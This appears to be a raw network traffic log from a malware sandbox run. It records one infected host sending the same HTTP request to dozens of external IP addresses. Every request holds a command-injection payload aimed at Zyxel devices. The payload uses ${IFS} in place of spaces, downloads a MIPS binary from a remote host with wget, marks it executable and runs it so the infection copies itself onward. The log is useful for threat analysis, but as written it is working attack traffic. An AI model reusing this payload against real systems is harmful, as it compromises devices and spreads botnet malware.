                                              Jan 29, 2024 07:04:04.300410986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7992192.168.2.14356642.238.10.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300446033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7993192.168.2.144412292.252.0.109443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300484896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7994192.168.2.1439032155.82.0.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300544977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7995192.168.2.1433926118.111.39.251443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300550938 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7996192.168.2.143786442.95.86.222443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300607920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7997192.168.2.145068690.124.19.3443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300656080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7998192.168.2.1441504177.167.75.44443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300678968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              7999192.168.2.1452682192.206.213.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300733089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8000192.168.2.144547649.140.32.254443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300781012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8001192.168.2.1455334117.177.117.35443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.300832987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8002192.168.2.1441152145.19.66.127443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.303684950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8003192.168.2.145071271.117.215.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.303733110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8004192.168.2.1454132163.115.104.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:04.303740978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8005192.168.2.1458606119.191.19.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312133074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8006192.168.2.145087449.206.65.88443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312180996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8007192.168.2.1453464186.4.96.219443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312222004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8008192.168.2.14453021.86.150.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312269926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8009192.168.2.144810457.203.211.195443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312330008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8010192.168.2.1447580154.203.230.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312366009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8011192.168.2.1440344149.243.241.23443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312410116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8012192.168.2.144519475.8.57.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312452078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8013192.168.2.1444666137.111.217.212443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312475920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8014192.168.2.1459826116.235.246.54443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312531948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8015192.168.2.1445558126.209.194.154443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312562943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8016192.168.2.1449218195.105.198.16443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312597036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8017192.168.2.1453098206.2.72.90443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312655926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8018192.168.2.1454990204.139.127.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312693119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8019192.168.2.1433220171.246.26.169443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312731028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8020192.168.2.1441908151.30.241.13443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312787056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8021192.168.2.1447614208.10.199.117443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312799931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8022192.168.2.143999458.132.102.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312861919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8023192.168.2.1445336217.185.81.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312889099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8024192.168.2.1439102101.172.104.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312935114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8025192.168.2.1435230138.104.191.236443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.312989950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8026192.168.2.1450326101.225.222.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313018084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8027192.168.2.1441110101.145.95.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313051939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8028192.168.2.1438712208.24.187.125443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313090086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8029192.168.2.1449270220.94.65.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313143969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8030192.168.2.144542276.238.206.230443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313184977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8031192.168.2.1458534217.225.196.75443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313242912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8032192.168.2.144899452.128.157.133443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313261986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8033192.168.2.1438062217.103.79.242443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313316107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8034192.168.2.143881820.22.139.73443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313354015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8035192.168.2.1449500179.200.73.32443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313396931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8036192.168.2.1439808128.150.81.188443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313431025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8037192.168.2.145063041.22.4.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313458920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8038192.168.2.145945461.57.144.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313524961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8039192.168.2.1450220130.196.50.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313554049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8040192.168.2.1444976105.9.187.69443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313600063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8041192.168.2.145735069.89.145.0443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313631058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8042192.168.2.144981832.82.152.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313666105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8043192.168.2.1459352203.6.138.223443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313695908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8044192.168.2.145253088.232.172.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313752890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8045192.168.2.1444328111.69.101.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313787937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8046192.168.2.1446258202.45.10.143443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313818932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8047192.168.2.143984835.192.164.15443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313838005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8048192.168.2.143973863.185.210.70443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313873053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8049192.168.2.143646042.168.187.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313918114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8050192.168.2.14590165.47.210.208443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.313983917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8051192.168.2.1450374159.84.218.197443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314018965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8052192.168.2.14489844.62.13.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314052105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8053192.168.2.1447418138.169.10.191443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314084053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8054192.168.2.1447196158.69.113.52443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:05.314106941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8055192.168.2.1433910182.152.121.0443
                                              TimestampBytes transferredDirectionData
